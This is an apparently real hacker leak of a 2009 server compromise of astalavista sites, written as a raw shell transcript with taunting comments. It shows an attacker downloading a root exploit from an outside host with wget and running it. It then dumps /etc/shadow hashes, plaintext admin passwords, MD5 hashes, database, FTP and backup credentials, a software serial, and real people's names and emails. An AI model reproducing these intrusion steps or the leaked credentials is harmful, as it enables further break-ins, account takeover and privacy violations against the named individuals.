astanet astanet 4096 Aug 11 2006 sitemap sh-3.2$ cat .htaccess authType Basic authName Admin authUserFile /home/astanet/auth/.htadm_pwd require valid-user sh-3.2$ cat /home/astanet/auth/.htadm_pwd admin2net:CR0bl65MwhfT sh-3.2$ mysql -u astanet_db -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 275153 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ | Database | +-----------------------+ | information_schema | | astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | | astanet_membersystem | | test | +-----------------------+ 6 rows in set (0.00 sec) mysql> use astanet_membersystem Database changed mysql> show tables; +-----------------------------------+ | Tables_in_astanet_membersystem | +-----------------------------------+ | blacklist_categories | | blacklist_content | | blacklist_levels | | blacklist_mcset | | dir_categories | | dir_comments | | dir_links | | dir_temp | | dir_votes | | documents | | documents_categories | | email_content | | email_settings | | exploits | | exploits_categories | | exploittree_categories | | exploittree_exploits | | home_values | | iso_countries | | links_categories | | links_records | | links_unauth | | links_votes | | log | | news_categories | | news_comments | | news_emoticons | | news_latest | | news_messages | | news_statistics | | news_votes | | prices_content | | prices_offers | | rss_settings | | sessions | | stats_signups | | u2u2 | | u2u_contact | | u2u_settings | | user_keywords_selected_categories | | users | | users_ipn_test | | users_keyword_values | | users_profile | | users_temp | | users_upgrade | +-----------------------------------+ 46 rows in set (0.00 sec) mysql> describe users; +--------------------------+--------------------------------------+- -----+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +--------------------------+--------------------------------------+- -----+-----+---------------------+----------------+ | primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment | | user | varchar(50) | NO | | | | | nickname | varchar(30) | NO | MUL | anonymous | | | password | varchar(30) | NO | | | | | userlevel | tinyint(3) | YES | MUL | NULL | | | exp | int(8) unsigned | NO | | 0 | | | email | varchar(50) | NO | | | | | ip | varchar(15) | NO | | 0 | | | proxy | set('0','1') | NO | | 0 | | | logtime | timestamp | NO | | CURRENT_TIMESTAMP | | | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | | | anz_in | tinyint(1) | NO | | -1 | | | status | tinyint(1) unsigned | NO | | 0 | | | checked | set('0','1','2') | NO | | 0 | | | freemember | set('0','1') | NO | | 0 | | | ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | | | lang | tinytext | NO | | | | | adid | smallint(6) | NO | | 0 | | | pp_txn_id | varchar(255) | YES | | NULL | | | cnb_transaction_id | varchar(255) | YES | | NULL | | | cnb_order_id | varchar(255) | YES | | NULL | | | cnb_user_id | int(11) | YES | | 0 | | +--------------------------+--------------------------------------+- -----+-----+---------------------+----------------+ 22 rows in set (0.01 sec) mysql> select count(*) as skids from users; +-------+ | skids | +-------+ | 25199 | +-------+ 1 row in set (0.00 sec) mysql> select user,nickname,password,email from users where userlevel = 1; +--------------------------+----------------------+----------------- -+-----------------------------------+ | user | nickname | password | email | +--------------------------+----------------------+----------------- -+-----------------------------------+ | pascal | prozac | astaman3 | info at astalavista.net | | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid at comvation.com | | qreymer | Palermo | qblsw85iam | eche at home.se | | Christian Wehrli | g0atherd | hitt?74 | g0atherd at gmx.net | | Andrew Blake | Minky | liq73uid | a.blake at har.mrc.ac.uk | | Martin Wyss | dinu | kj63;cXy | martin.wyss at astalavista.net | | Leandro Nery | Timan_no_Sanco | nery2002 | leandronery at hotmail.com | | shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1 at hotmail.com | | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence at hotmail.com | | David M Lee | Daremo | icG12m03 | daremo at hackerheaven.com | | David Corn | akriel | ve3uB$cUku | akriel at fallenroot.net | | Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin at astalavista.net | | Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus at hotmail.com | | David Ellis | dellis203 | philip | dellis at nightwatchnss.com | | Lars Christian Solberg | xeor | tF3s4|Nea | xeor at hush.com | | Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos at gmx.ch | | Thomas D?ppen | daha | asta4tom | thomas.daeppen at astalavista.ch | | Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m at gmail.com | | Fabius Bernet | traviser | wellenreiter100 | fabius.bernet at astalavista.ch | | Zachary McElroy | duder1 | dirty245dix | mcelroyzj at yahoo.com | | Leron Cohen | cohen2 | leron4free | leron at quiredmedia.com | | Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes at gmail.com | | Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout at webhostline.com | | developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid at astalavista.ch | | Peter Fisher | cyph3r1 | testZer025435 | cyph3r at astalavista.com | | sykadul | sykadul | ak29eral | sykadul at gmail.com | | Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi at astalavista.ch | +--------------------------+----------------------+----------------- -+-----------------------------------+ 27 rows in set (0.00 sec) mysql> exit; Bye [~] plaintext passwords? yes, Those so called "security professionals" who charge you $6.66 / month to register at their hack-proof portal, save your passwords in plaintext... brilliant! [~] This been fun but we want more. sh-3.2$ uname -a Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux sh-3.2$ wget http://anti.sec.labs/g0troot --13:33:37-- http://anti.sec.labs/g0troot Resolving anti.sec.labs... 13.33.33.37 Connecting to anti.sec.labs|13.33.33.37|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 18200 (18K) [text/plain] Saving to: `g0troot' 100%[=============================================================== ==================================================================== ======>] 18,200 58.6K/s in 0.3s 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200] sh-3.2$ ./g0troot -i x86_64 [+] g0troot - anti.sec.labs [+] Target: 2.6.18-128.1.10.el5 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] [+] r00tr00t [~] Executing shell... sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# cat /etc/shadow root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7::: [snip] admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7::: jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7::: com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7::: astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7::: sh-3.2# cat /etc/motd ##################################################### #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ # # |__| [__ | |__| | |__| | | | [__ | |__| # # | | ___] | | | |___ | | \/ | ___] | | | # # # ##################################################### # # # Admin Contact - support at secureservertech.com # # # # Available ShortCuts # # # # nst - list active connections # # ddos - shows how many times each ip is connected # # ltr - restart the webserver # # phpc - edit the php config file # # htc - edit the webserver configuration file # # up - uptime # # etd - edit the motd of the day file # # htr - start and restart apache if needed # # syng - shows active SYN_RECV connections # # synd - syn flood blocker - "synd -h" for usage # ##################################################### # NOTES: # # Last Upgrade - 12-08-2008 by JF # # My.cnf/Mysql Optimization - 1-28-09 # # # # # # # ##################################################### sh-3.2# lastlog | grep -v Never Username Port From Latest root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009 admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008 com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009 astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 sh-3.2# ls -la total 453376 drwxr-x--- 15 root root 4096 Jun 4 08:40 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg -rw------- 1 root root 16836 Jun 4 07:21 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rwx------ 1 root root 1899 Oct 28 2007 bk.sh -rw-r--r-- 1 root root 1327 Nov 29 2007 cert -rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql drwxr-xr-x 4 root root 4096 May 20 2008 .cpan -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql drwx------ 2 root root 4096 Oct 28 2007 .elinks drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1 -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 -rw------- 1 root root 0 Apr 16 13:19 .history -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh -rw------- 1 root root 35 Jun 2 14:23 .lesshst drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2- grsec.tar.gz -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2 -rwx------ 1 root root 760 Sep 18 2008 lp drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1 -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent- x86_64-linux.tar.gz -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent- x86_64-linux.tar.gz.1 drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9 -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent- x86_64-linux.tar.gz drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3 -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent- x86_64-linux.tar.gz -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh -rw------- 1 root root 41 Oct 19 2007 .my.cnf -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport -rw------- 1 root root 41 May 20 2008 .mytop drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6 -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp -rw------- 1 root root 1462 Sep 21 2007 opt.php -rw-r--r-- 1 root root 3371 Sep 22 2007 p -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2 -rw------- 1 root root 1024 Feb 3 21:32 .rnd -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr -rw-r--r-- 1 root root 887 Nov 28 2007 server.key drwx------ 2 root root 4096 Oct 10 2008 .ssh -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1 drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0 -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind- 3.3.0.tar.bz2 -rw------- 1 root root 12997 May 16 2008 .viminfo sh-3.2# cat .bash_history [snip] wget cp4sst.com/sstlinux.tar.gz tar zxvf sstlinux.tar.gz cd linux-2.6.27.10 sh install.sh make bzImage ; make modules ; make modules_install ; make install make clean service mysqld restart [snip] cd /usr/sbin/ chmod 4777 traceroute chmod 4777 ping traceroute -I www.astalavista.ch [snip] vi /etc/csf/csf.conf traceroute google.ch service csf restart tracert google.ch service csf restart traceroute www.google.ch tracert www.google.ch traceroute www.google.ch locate traceroute chown 4755 /bin/traceroute chown 4777 /bin/traceroute locate ping chown 4755 /bin/ping chown 4777 /bin/ping cd /bin/ ls -ali | grep ping chown root ping chmod 4755 ping ls -ali | grep traceroute chown root traceroute chmod 4755 traceroute ls -ali | grep traceroute traceroute -I www.google.ch traceroute www.google.ch whois pmsantos.ch [snip] mysql -h com_contrexx2_live < /root/defaultp_ports.sql mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql top ping ssth.ch ping asdlkfaljgasd???ljg???lasj.ch ping asdlkfaljgasdlasj.ch ping www.ssth.ch ping ssth.ch nslookup www.google.ch nslookup www.ssth.ch man nslookup ping www.google.ch nslookup www.google.ch nslookup www.google.ch nslookup salfjasdlf.ch [snip] openssl passwd -1 sadf openssl passwd -1 5cZNHstdTy mysql mysql locate proftp vi /etc/proftpd.passwd service proftpd restart locate proftpd.conf vi /etc/proftpd.conf vi /etc/proftpd.passwd service proftpd restart [snip] /bin/sh /home/com/backup_system/backup.sh tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql ls -ali mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql crontab -l crontab -l php -q /home/com/public_html/modifications/cronjobs/securitynews.php /home/com/public_html/modifications/cronjobs/exploits.sh wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent- x86_64-linux.tar.gz tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz cd lsws-4.0.3 sh install.sh uptime hdparm -tt /dev/sda iostat yum install iostat iostat whereis iostat yjm clean all yum clean all ; yum -y update iostat yum install systat rpm -qa | grep iostat rpm -qa | grep sysstat rpm -qa | grep systat dmesg -c sysctl -p uname -r cd /usr/src wget nix101.com/kernels/sstlinux.tar.gz shutdown -r now nano -w /boot/grub/grub.conf sh-3.2# cat .my.cnf [client] user=da_admin password=X9dctmRH sh-3.2# cat /home/com/backup_system/backup.sh #!/bin/sh #################################################################### # # # # incremental backup for astalavista.com # # # # author: Paulo M. Santos # # # #################################################################### # [snip] PROG_DIR="/home/com/backup_system"; BACKUP_DIR="/home/com/backups"; DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html"; # ftp for synology backup server FTP_HOST="212.254.194.163"; FTP_PORT="21"; FTP_USER="astalavista.com"; FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V"; FTP_DIR="/astalavista.com"; # database DB_HOST="localhost"; DB_USER="contrexxuser2"; DB_PASS="0fEYNZgXz1pKe"; DB_DATABASE1="com_contrexx2_live"; DB_DATABASE2="com_contrexx2"; [snip] ftp -in $FTP_HOST $FTP_PORT < ./domains/astalavista.net/public_html -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow sh-3.2# cd auth/ sh-3.2# ls -la total 28 drwxr-xr-x 2 root root 4096 Dec 23 16:00 . drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .. -rw-r--r-- 1 root root 321 Jan 5 2006 hackercontest.config.inc.php -rw-r--r-- 1 root root 319 Jan 5 2006 hosting.config.inc.php -rw-r--r-- 1 root root 24 Jun 4 09:38 .htadm_pwd -rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting -rw-r--r-- 1 root root 51 Oct 11 2006 .htwebalizer_pwd sh-3.2# cat hackercontest.config.inc.php sh-3.2# cat hosting.config.inc.php sh-3.2# cd .. sh-3.2# cd com sh-3.2# ls -la total 141208 drwx--x--x 10 com com 4096 Apr 28 12:40 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. drwx------ 2 com com 4096 Jun 4 04:04 backups -rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system -rw------- 1 com com 21880 Jun 2 08:07 .bash_history -rw-r--r-- 1 com com 24 Sep 24 2007 .bash_logout -rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile -rw-r--r-- 1 com com 124 Sep 24 2007 .bashrc drwx--x--x 3 com com 4096 Jan 29 2008 domains -rw-r--r-- 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap -rw------- 1 com com 69 Nov 18 2008 .lesshst drwx------ 2 com com 4096 Sep 24 2007 mail -rw------- 1 com com 13970 Mar 28 21:42 .mysql_history drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html -rw-r----- 1 com mail 34 Sep 24 2007 .shadow drwx------ 2 com com 4096 Aug 26 2008 .ssh -rwx------ 1 com com 8515 Feb 10 2008 t -rw-rw-r-- 1 com com 6265 Feb 11 2008 t.c drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp -rw-rw-r-- 1 com com 617 May 20 2008 .toprc -rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup- 20080519-0900.sql -rw------- 1 com com 16629 Mar 28 21:46 .viminfo -rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc sh-3.2# head t.c /* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj jakesyk rozbite. * * Linux vmsplice Local Root Exploit * By qaaz * sh-3.2# cd / sh-3.2# ls -la total 360 drwxr-xr-x 25 root root 4096 Jun 3 02:43 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. -rw------- 1 root root 10240 Jun 3 02:39 aquota.group -rw------- 1 root root 10240 Jun 3 02:39 aquota.user -rw-r----- 1 root root 819 Jul 17 2008 astalavista.us.db -rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck -rw-r--r-- 1 root root 0 Sep 16 2007 .autorelabel drwxr-xr-x 3 root root 4096 Dec 29 2007 backup drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc drwxr-xr-x 14 root root 4096 Mar 11 17:56 home -rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64 drwx------ 2 root root 16384 Sep 11 2007 lost+found drwxr-xr-x 2 root root 4096 Mar 11 17:56 media drwxr-xr-x 2 root root 0 Jun 3 02:43 misc drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt -rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg drwxr-xr-x 2 root root 0 Jun 3 02:43 net drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc drwxr-x--- 15 root root 4096 Jun 4 08:40 root drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv drwxr-xr-x 11 root root 0 Jun 3 02:42 sys drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr drwxr-xr-x 26 root root 4096 Jun 4 03:16 var sh-3.2# cd opt sh-3.2# ls -la total 20 drwxr-xr-x 3 root root 4096 Mar 11 17:56 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws sh-3.2# cd lsws/ sh-3.2# ls -la total 108 drwxr-xr-x 15 root root 4096 Mar 20 2008 . drwxr-xr-x 3 root root 4096 Mar 11 17:56 .. drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons drwxr-xr-x 13 root root 4096 May 29 15:10 admin drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate drwxr-xr-x 2 root root 4096 May 29 15:10 bin drwx------ 4 apache apache 4096 Jun 3 02:43 conf drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT drwxr-xr-x 2 root root 4096 Sep 15 2008 docs drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin drwxr-xr-x 2 root root 4096 Sep 15 2008 lib -rw-r--r-- 1 root root 6959 May 29 15:10 LICENSE -rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP -rw-r--r-- 1 root root 6279 May 29 15:10 LICENSE.OpenSSL -rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs drwxr-xr-x 2 root root 4096 Mar 20 2008 php drwx------ 2 apache apache 4096 Mar 20 2008 phpbuild drwxr-xr-x 3 root root 4096 Mar 20 2008 share -rw-r--r-- 1 root root 6 May 29 15:10 VERSION sh-3.2# cd conf sh-3.2# ls -la total 48 drwx------ 4 apache apache 4096 Jun 3 02:43 . drwxr-xr-x 15 root root 4096 Mar 20 2008 .. drwx------ 2 apache apache 4096 Mar 20 2008 cert -rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml -rw------- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak -rw-r--r-- 1 root apache 0 Jun 3 14:11 .last -rw------- 1 apache apache 256 May 29 15:10 license.key -rw------- 1 apache apache 256 Mar 21 2008 license.key.old -rw------- 1 apache apache 3320 Mar 20 2008 mime.properties -rw------- 1 apache apache 20 May 29 15:10 serial.no drwx------ 2 apache apache 4096 Mar 20 2008 templates sh-3.2# cat serial.no IbDl-oVsO-CKqL-wVRa sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 286844 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ | Database | +-----------------------+ | information_schema | | astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | | astanet_membersystem | | com_contrexx | | com_contrexx2 | | com_contrexx2_live | | da_roundcube | | dolphin | | ideapool | | mysql | | test | | yourmaster | +-----------------------+ 14 rows in set (0.00 sec) mysql> use ideapool Database changed mysql> show tables; +-----------------------------------+ | Tables_in_ideapool | +-----------------------------------+ | eventum_columns_to_display | | eventum_custom_field | | eventum_custom_field_option | | eventum_custom_filter | | eventum_customer_account_manager | | eventum_customer_note | | eventum_email_account | | eventum_email_draft | | eventum_email_draft_recipient | | eventum_email_response | | eventum_faq | | eventum_faq_support_level | | eventum_group | | eventum_history_type | | eventum_irc_notice | | eventum_issue | | eventum_issue_association | | eventum_issue_attachment | | eventum_issue_attachment_file | | eventum_issue_checkin | | eventum_issue_custom_field | | eventum_issue_history | | eventum_issue_quarantine | | eventum_issue_requirement | | eventum_issue_user | | eventum_issue_user_replier | | eventum_link_filter | | eventum_mail_queue | | eventum_mail_queue_log | | eventum_news | | eventum_note | | eventum_phone_support | | eventum_project | | eventum_project_category | | eventum_project_custom_field | | eventum_project_email_response | | eventum_project_field_display | | eventum_project_group | | eventum_project_link_filter | | eventum_project_news | | eventum_project_phone_category | | eventum_project_priority | | eventum_project_release | | eventum_project_round_robin | | eventum_project_status | | eventum_project_status_date | | eventum_project_user | | eventum_reminder_action | | eventum_reminder_action_list | | eventum_reminder_action_type | | eventum_reminder_field | | eventum_reminder_history | | eventum_reminder_level | | eventum_reminder_level_condition | | eventum_reminder_operator | | eventum_reminder_priority | | eventum_reminder_requirement | | eventum_reminder_triggered_action | | eventum_resolution | | eventum_round_robin_user | | eventum_search_profile | | eventum_status | | eventum_subscription | | eventum_subscription_type | | eventum_support_email | | eventum_support_email_body | | eventum_time_tracking | | eventum_time_tracking_category | | eventum_user | +-----------------------------------+ 69 rows in set (0.00 sec) mysql> describe eventum_user; +-------------------------+------------------+------+-----+--------- ------------+----------------+ | Field | Type | Null | Key | Default | Extra | +-------------------------+------------------+------+-----+--------- ------------+----------------+ | usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment | | usr_grp_id | int(11) unsigned | YES | MUL | NULL | | | usr_customer_id | int(11) unsigned | YES | | NULL | | | usr_customer_contact_id | int(11) unsigned | YES | | NULL | | | usr_created_date | datetime | NO | | 0000-00- 00 00:00:00 | | | usr_status | varchar(8) | NO | | active | | | usr_password | varchar(32) | NO | | | | | usr_full_name | varchar(255) | NO | | | | | usr_email | varchar(255) | NO | UNI | | | | usr_preferences | longtext | YES | | NULL | | | usr_sms_email | varchar(255) | YES | | NULL | | | usr_clocked_in | tinyint(1) | YES | | 0 | | | usr_lang | varchar(5) | YES | | NULL | | +-------------------------+------------------+------+-----+--------- ------------+----------------+ 13 rows in set (0.00 sec) mysql> select usr_full_name,usr_email,usr_password from eventum_user; +----------------------+-------------------------------+------------ ----------------------+ | usr_full_name | usr_email | usr_password | +----------------------+-------------------------------+------------ ----------------------+ | system | system-account at example.com | 14589714398751513457adf349173434 | | Developer (Paulo) | paulo.santos at astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb | | Be1er0ph0r | be1er0ph0r at gmx.de | 229766dc0ca1fb67160a8782321dfdce | | Admin | pascal.mittner at astalavista.ch | 57c2877c1d84c4b49f3289657deca65c | | ADMIN | admin at astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 | | USER | user at astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 | | Glafkos - (nowayout) | glafkos at astalavista.com | f7735ab119023a8abb2301e67f81cd67 | | Joao | joao.pontes at astalavista.net | f805c071d7c823b937448c54c047b9fd | | Pascal | pm at astalavista.ch | e10adc3949ba59abbe56e057f20f883e | | commander | commander at astalavista.com | 932cd250918f881d41feb0b93883a926 | | ishtus | ishtus at astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 | | sykadul | sykadul at astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | | Zach McElroy | admin at badfoo.net | 33c5d4954da881814420f3ba39772644 | | usb | usbenigma at hushmail.com | b513f22c3db6932855ad732f5f8a10a2 | | cyph3r | cyph3r at astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee | +----------------------+-------------------------------+------------ ----------------------+ 15 rows in set (0.00 sec) mysql> select iss_description from eventum_issue where iss_id = 43; +------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- --------------+ | iss_description | +------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- --------------+ | Ok guys, to boost our traffic and revenue what we have to do is keep users logged in... how to do that? well think about it... if a user is watching a movie... he'll be connected for 90 mins... 120mins... so what i propose is something like: http://www.surfthechannel.com/ since they only provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same... "iframe" the content on our website or use a system like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed... which doesn't break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off if they think it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA... We could also put advertisement during play on the flash video player itself... extra $$... By sykadul | +------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- -------------------------------------------------------------------- --------------+ 1 row in set (0.00 sec) // Money and extra $$ is all they care about. remember that. mysql> select iss_summary,iss_description from eventum_issue where iss_id =42; +------------------------+------------------------------------------ -------------------------------------------------------------------- -------------------------------------------------------------------- ---------------------------------------------------------+ | iss_summary | iss_description | +------------------------+------------------------------------------ -------------------------------------------------------------------- -------------------------------------------------------------------- ---------------------------------------------------------+ | Forum for REAL EXPERTS | Hello, Ishtus and I, Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.. One example a friend of mine from coresecurity.com! We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.. | +------------------------+------------------------------------------ -------------------------------------------------------------------- -------------------------------------------------------------------- --------------------------------------------------------+ 1 row in set (0.00 sec) // What an awesome yet original idea Ishtus and him... bring MORE security "experts", thats exactly what the world needs... mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16; +------------------+------------------------------------------------ ---------------------------------------------+ | iss_summary | iss_description | +------------------+------------------------------------------------ ---------------------------------------------+ | Website guidance | Virtual Girl which guides you trought the website. We need a girl with who you can ( talk )!!! Also for the News! So my suggestion is a girl who read you the news loud if you like! you can choose between read yourselfe or she read it for you or both! Go to www.heise.de! There is an example for Voice News! It's a good thing!!! Have a look on the example girls!! http://www.yaoti.com/de/free_yaoti.html or that 